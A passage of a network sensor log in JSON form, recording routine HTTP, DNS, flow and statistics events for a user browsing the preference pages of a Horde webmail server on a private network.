Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4356}} {"timestamp":"2020-02-29T00:25:07.160564+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde&group=identities","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4356},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":20138,"tx_id":17}} 
{"timestamp":"2020-02-29T00:25:07.164197+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":18,"http":{"hostname":"mail.spiral.com","url":"\/js\/identityselect.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":461}} {"timestamp":"2020-02-29T00:25:07.179831+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/identityselect.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":461},"app_proto":"http","fileinfo":{"filename":"\/js\/identityselect.js","state":"CLOSED","stored":false,"size":983,"tx_id":18}} {"timestamp":"2020-02-29T00:25:07.221307+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":19,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-delete.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":117}} 
{"timestamp":"2020-02-29T00:25:10.000204+0000","event_type":"stats","stats":{"uptime":15162,"capture":{"kernel_packets":140833,"kernel_drops":0},"decoder":{"pkts":140850,"bytes":96657728,"invalid":195,"ipv4":139263,"ipv6":10,"ethernet":140850,"raw":0,"null":0,"sll":0,"tcp":133697,"udp":5356,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7088992},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2896,"ssn_memcap_drop":0,"pseudo":353,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2912,"synack":2903,"rst":1218,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1910,"ftp":0,"smtp":0,"tls":780,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2449,"failed_udp":116},"tx":{"http":4961,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2533}},"flow_mgr":{"closed_pruned":2873,"new_pruned":17,"est_pruned":2531,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":10897,"memcap_state":0,"memcap_global":0},"http":{"memuse":35584,"memcap":0}}} 
{"timestamp":"2020-02-29T00:25:12.185232+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-delete.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":117},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button-delete.png","state":"CLOSED","stored":false,"size":117,"tx_id":19}} {"timestamp":"2020-02-29T00:25:12.486392+0000","flow_id":1109783837436920,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59784,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":16535,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:25:12.594276+0000","flow_id":1109783837436920,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59784,"proto":"UDP","dns":{"type":"answer","id":16535,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:25:12.594276+0000","flow_id":1109783837436920,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59784,"proto":"UDP","dns":{"type":"answer","id":16535,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:25:12.665144+0000","flow_id":235487409740482,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53132,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; 
rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":233,"tx_id":0}} {"timestamp":"2020-02-29T00:25:12.676492+0000","flow_id":235487409740482,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53132,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":4383}} {"timestamp":"2020-02-29T00:25:12.880834+0000","flow_id":235487409740482,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53132,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":4383},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":20182,"tx_id":0}} {"timestamp":"2020-02-29T00:25:12.882591+0000","flow_id":235487409740482,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53132,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/alerts\/success.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux 
x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":469}} {"timestamp":"2020-02-29T00:25:15.000420+0000","flow_id":2114307948884849,"event_type":"flow","src_ip":"192.168.10.122","src_port":38148,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:20:13.602993+0000","end":"2020-02-29T00:20:13.714116+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:25:17.000335+0000","event_type":"stats","stats":{"uptime":15169,"capture":{"kernel_packets":141313,"kernel_drops":0},"decoder":{"pkts":141412,"bytes":97133781,"invalid":195,"ipv4":139825,"ipv6":10,"ethernet":141412,"raw":0,"null":0,"sll":0,"tcp":134257,"udp":5358,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7091008},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2903,"ssn_memcap_drop":0,"pseudo":354,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2919,"synack":2910,"rst":1221,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1911,"ftp":0,"smtp":0,"tls":786,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2450,"failed_udp":116},"tx":{"http":4963,"smtp":0,"tls":0,"dns_
tcp":0,"dns_udp":2534}},"flow_mgr":{"closed_pruned":2873,"new_pruned":17,"est_pruned":2532,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":10897,"memcap_state":0,"memcap_global":0},"http":{"memuse":35665,"memcap":0}}} {"timestamp":"2020-02-29T00:25:17.000998+0000","flow_id":80645229386881,"event_type":"flow","src_ip":"192.168.10.122","src_port":55639,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:20:16.662657+0000","end":"2020-02-29T00:20:16.774063+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:25:17.887686+0000","flow_id":235487409740482,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53132,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/alerts\/success.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":469},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/alerts\/success.png","state":"CLOSED","stored":false,"size":469,"tx_id":1}} {"timestamp":"2020-02-29T00:25:19.023428+0000","flow_id":543208932072324,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50951,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":35784,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:25:19.131426+0000","flow_id":543208932072324,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50951,"proto":"UDP","dns":{"type":"answer","id":35784,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:25:19.131426+0000","flow_id":543208932072324,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50951,"proto":"UDP","dns":{"type":"answer","id":35784,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:25:19.213257+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53134,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3425}} {"timestamp":"2020-02-29T00:25:21.496587+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53134,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3425},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":18034,"tx_id":0}} 
{"timestamp":"2020-02-29T00:25:21.508513+0000","flow_id":1159635523453537,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46389,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64085,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:25:21.616770+0000","flow_id":1159635523453537,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46389,"proto":"UDP","dns":{"type":"answer","id":64085,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:25:21.616770+0000","flow_id":1159635523453537,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46389,"proto":"UDP","dns":{"type":"answer","id":64085,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:25:21.742083+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53134,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3799}} {"timestamp":"2020-02-29T00:25:21.795448+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53134,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3799},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":20554,"tx_id":1}} {"timestamp":"2020-02-29T00:25:21.799324+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53134,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2951}} {"timestamp":"2020-02-29T00:25:21.802311+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53134,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2951},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/screen.css","state":"CLOSED","stored":false,"size":12657,"tx_id":2}} {"timestamp":"2020-02-29T00:25:21.802660+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53134,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/basic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1633}} {"timestamp":"2020-02-29T00:25:21.834936+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53134,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/basic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1633},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/basic\/screen.css","state":"CLOSED","stored":false,"size":6255,"tx_id":3}} {"timestamp":"2020-02-29T00:25:21.835707+0000","flow_id":1482449560383490,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53138,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-right-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":161}} {"timestamp":"2020-02-29T00:25:21.833550+0000","flow_id":1291220436495971,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53136,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-center-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":103}} {"timestamp":"2020-02-29T00:25:21.877288+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53134,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-left-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":179}} {"timestamp":"2020-02-29T00:25:21.887524+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53134,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-left-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":179},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-left-active.png","state":"CLOSED","stored":false,"size":179,"tx_id":4}} {"timestamp":"2020-02-29T00:25:21.888085+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53134,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742}} {"timestamp":"2020-02-29T00:25:22.002635+0000","flow_id":412190935165934,"event_type":"flow","src_ip":"192.168.10.122","src_port":60597,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:20:21.601070+0000","end":"2020-02-29T00:20:21.712317+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:25:24.000418+0000","event_type":"stats","stats":{"uptime":15176,"capture":{"kernel_packets":141522,"kernel_drops":0},"decoder":{"pkts":141561,"bytes":97241089,"invalid":195,"ipv4":139974,"ipv6":10,"ethernet":141561,"raw":0,"null":0,"sll":0,"tcp":134402,"udp":5362,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7091872},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2906,"ssn_memcap_drop":0,"pseudo":354,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2922,"synack":2913,"rst":1221,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1914,"ftp":0,"smtp":0,"tls":786,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2452,"failed_udp":116},"tx":{"http":4971,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2536}},"flow_mgr":{"closed_pruned":2873,"new_pruned":17,"est_pruned":2
534,"bypassed_pruned":0,"flows_checked":4,"flows_notimeout":3,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65532,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":10897,"memcap_state":0,"memcap_global":0},"http":{"memuse":105136,"memcap":0}}} {"timestamp":"2020-02-29T00:25:24.162555+0000","flow_id":33615357704955,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34990,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":56920,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:25:24.190806+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53134,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/favicon.ico","state":"CLOSED","stored":false,"size":1742,"tx_id":5}} {"timestamp":"2020-02-29T00:25:24.271143+0000","flow_id":33615357704955,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34990,"proto":"UDP","dns":{"type":"answer","id":56920,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:25:24.271143+0000","flow_id":33615357704955,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34990,"proto":"UDP","dns":{"type":"answer","id":56920,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:25:24.383397+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53134,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp&group=delmove","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5316}} {"timestamp":"2020-02-29T00:25:24.444426+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53134,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp&group=delmove","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5316},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":23007,"tx_id":6}} {"timestamp":"2020-02-29T00:25:24.446802+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53134,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/folderprefs.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":852}} 
